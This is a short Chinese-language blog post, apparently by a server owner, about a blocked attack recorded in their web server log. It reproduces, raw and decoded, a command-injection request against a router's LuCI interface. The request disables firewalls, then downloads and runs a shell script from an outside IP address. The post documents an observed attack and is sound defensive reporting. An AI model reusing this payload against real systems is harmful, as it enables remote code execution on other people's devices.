216.158.236.226 - - [29/Aug/2023:22:09:39 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20/tmp%3Brm%20zizuo.sh%3Brm%20-rf%20zizuo.sh%3Bufw%20disable%3Bsystemctl%20stop%20firewalld.service%3Bsystemctl%20stop%20firewalld%3Bservice%20iptables%C2%A0stop%3Bwget%20http%3A//167.99.208.15/zizuo.sh%3Bchmod%20777%20zizuo.sh%3Bsh%20zizuo.sh) HTTP/1.1" 403 235 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
從美國來的 IP
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd /tmp;rm zizuo.sh;rm -rf zizuo.sh;ufw disable;systemctl stop firewalld.service;systemctl stop firewalld;service iptables stop;wget http://167.99.208.15/zizuo.sh;chmod 777 zizuo.sh;sh zizuo.sh)
嘗試透過 cgi的漏洞(?)來關閉我的防火牆, 並遠端執行 zizuo.sh, 但我沒有裝防火牆😂
zizuo.sh中的文字碼 :
查詢 IP: 167.99.208.15 來自荷蘭
而且架設的網站還含有惡意程式
沒有留言:
張貼留言